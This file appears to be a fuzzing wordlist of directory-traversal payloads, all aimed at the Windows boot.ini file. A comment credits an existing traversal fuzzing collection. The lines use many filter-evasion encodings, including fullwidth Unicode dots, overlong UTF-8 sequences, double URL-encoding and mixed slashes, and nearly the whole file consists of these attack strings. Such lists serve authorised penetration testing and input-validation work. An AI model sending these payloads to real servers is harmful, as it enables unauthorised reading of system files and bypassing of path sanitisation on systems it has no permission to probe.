-%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216boot.ini -..0x2fboot.ini -..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2f..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2fboot.ini -..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2fboot.ini -0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/boot.ini -0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2fboot.ini -..0x5cboot.ini -..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cboot.ini -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cboot.ini -0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\boot.ini -0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5cboot.ini -..%c0%2fboot.ini -..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2fboot.ini -%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini -%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2fboot.ini -..%c0%5cboot.ini -..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5cboot.ini -%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\boot.ini -%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5cboot.ini -///%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -\\\%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini -..//boot.ini -..//..//boot.ini -..//..//..//boot.ini -..//..//..//..//boot.ini -..//..//..//..//..//boot.ini -..//..//..//..//..//..//boot.ini -..//..//..//..//..//..//..//boot.ini -..//..//..//..//..//..//..//..//boot.ini -..///boot.ini -..///..///boot.ini -..///..///..///boot.ini -..///..///..///..///boot.ini -..///..///..///..///..///boot.ini -..///..///..///..///..///..///boot.ini -..///..///..///..///..///..///..///boot.ini -..///..///..///..///..///..///..///..///boot.ini -..\\boot.ini -..\\..\\boot.ini -..\\..\\..\\boot.ini -..\\..\\..\\..\\boot.ini -..\\..\\..\\..\\..\\boot.ini -..\\..\\..\\..\\..\\..\\boot.ini -..\\..\\..\\..\\..\\..\\..\\boot.ini -..\\..\\..\\..\\..\\..\\..\\..\\boot.ini -..\\\boot.ini -..\\\..\\\boot.ini -..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\..\\\..\\\..\\\..\\\boot.ini -..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\boot.ini -./\/./boot.ini -./\/././\/./boot.ini -./\/././\/././\/./boot.ini -./\/././\/././\/././\/./boot.ini -./\/././\/././\/././\/././\/./boot.ini -./\/././\/././\/././\/././\/././\/./boot.ini -./\/././\/././\/././\/././\/././\/././\/./boot.ini -./\/././\/././\/././\/././\/././\/././\/././\/./boot.ini -.\/\.\boot.ini -.\/\.\.\/\.\boot.ini -.\/\.\.\/\.\.\/\.\boot.ini -.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../boot.ini -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\boot.ini -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\boot.ini -./../boot.ini -./.././../boot.ini -./.././.././../boot.ini -./.././.././.././../boot.ini -./.././.././.././.././../boot.ini -./.././.././.././.././.././../boot.ini -./.././.././.././.././.././.././../boot.ini -./.././.././.././.././.././.././.././../boot.ini -.\..\boot.ini -.\..\.\..\boot.ini -.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\.\..\.\..\.\..\.\..\boot.ini -.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\boot.ini -.//..//boot.ini -.//..//.//..//boot.ini -.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//.//..//.//..//.//..//.//..//boot.ini -.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//boot.ini -.\\..\\boot.ini -.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini -../boot.ini -../..//boot.ini -../..//../boot.ini -../..//../..//boot.ini -../..//../..//../boot.ini -../..//../..//../..//boot.ini -../..//../..//../..//../boot.ini -../..//../..//../..//../..//boot.ini -..\boot.ini -..\..\\boot.ini -..\..\\..\boot.ini -..\..\\..\..\\boot.ini -..\..\\..\..\\..\boot.ini -..\..\\..\..\\..\..\\boot.ini -..\..\\..\..\\..\..\\..\boot.ini -..\..\\..\..\\..\..\\..\..\\boot.ini -..///boot.ini -../..///boot.ini -../..//..///boot.ini -../..//../..///boot.ini -../..//../..//..///boot.ini -../..//../..//../..///boot.ini -../..//../..//../..//..///boot.ini -../..//../..//../..//../..///boot.ini -..\\\boot.ini -..\..\\\boot.ini -..\..\\..\\\boot.ini -..\..\\..\..\\\boot.ini -..\..\\..\..\\..\\\boot.ini -..\..\\..\..\\..\..\\\boot.ini -..\..\\..\..\\..\..\\..\\\boot.ini -..\..\\..\..\\..\..\\..\..\\\boot.ini -# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni -# Did some cleanup & removed anything to the right of boot.ini for inclusion in a -# separate fuzzfile for more flexibiity -/../boot.ini -/../../boot.ini -/../../../boot.ini -/../../../../boot.ini -/../../../../../boot.ini -/../../../../../../boot.ini -/../../../../../../../boot.ini -/../../../../../../../../boot.ini -/..%2fboot.ini -/..%2f..%2fboot.ini -/..%2f..%2f..%2fboot.ini -/..%2f..%2f..%2f..%2fboot.ini -/..%2f..%2f..%2f..%2f..%2fboot.ini -/..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -/..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -/%2e%2e/boot.ini -/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -/..%252fboot.ini -/..%252f..%252fboot.ini -/..%252f..%252f..%252fboot.ini -/..%252f..%252f..%252f..%252fboot.ini -/..%252f..%252f..%252f..%252f..%252fboot.ini -/..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -/..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini -/%252e%252e/boot.ini -/%252e%252e/%252e%252e/boot.ini -/%252e%252e/%252e%252e/%252e%252e/boot.ini -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -/%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini -/..\boot.ini -/..\..\boot.ini -/..\..\..\boot.ini -/..\..\..\..\boot.ini -/..\..\..\..\..\boot.ini -/..\..\..\..\..\..\boot.ini -/..\..\..\..\..\..\..\boot.ini -/..\..\..\..\..\..\..\..\boot.ini -/..%255cboot.ini -/..%255c..%255cboot.ini -/..%255c..%255c..%255cboot.ini -/..%255c..%255c..%255c..%255cboot.ini -/..%255c..%255c..%255c..%255c..%255cboot.ini -/..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -/..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini -/..%5c..%5cboot.ini -/..%5c..%5c..%5cboot.ini -/..%5c..%5c..%5c..%5cboot.ini -/..%5c..%5c..%5c..%5c..%5cboot.ini -/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -/..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini -/%2e%2e\boot.ini -/%2e%2e\%2e%2e\boot.ini -/%2e%2e\%2e%2e\%2e%2e\boot.ini -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini -/%2e%2e%5cboot.ini -/%2e%2e%5c%2e%2e%5cboot.ini 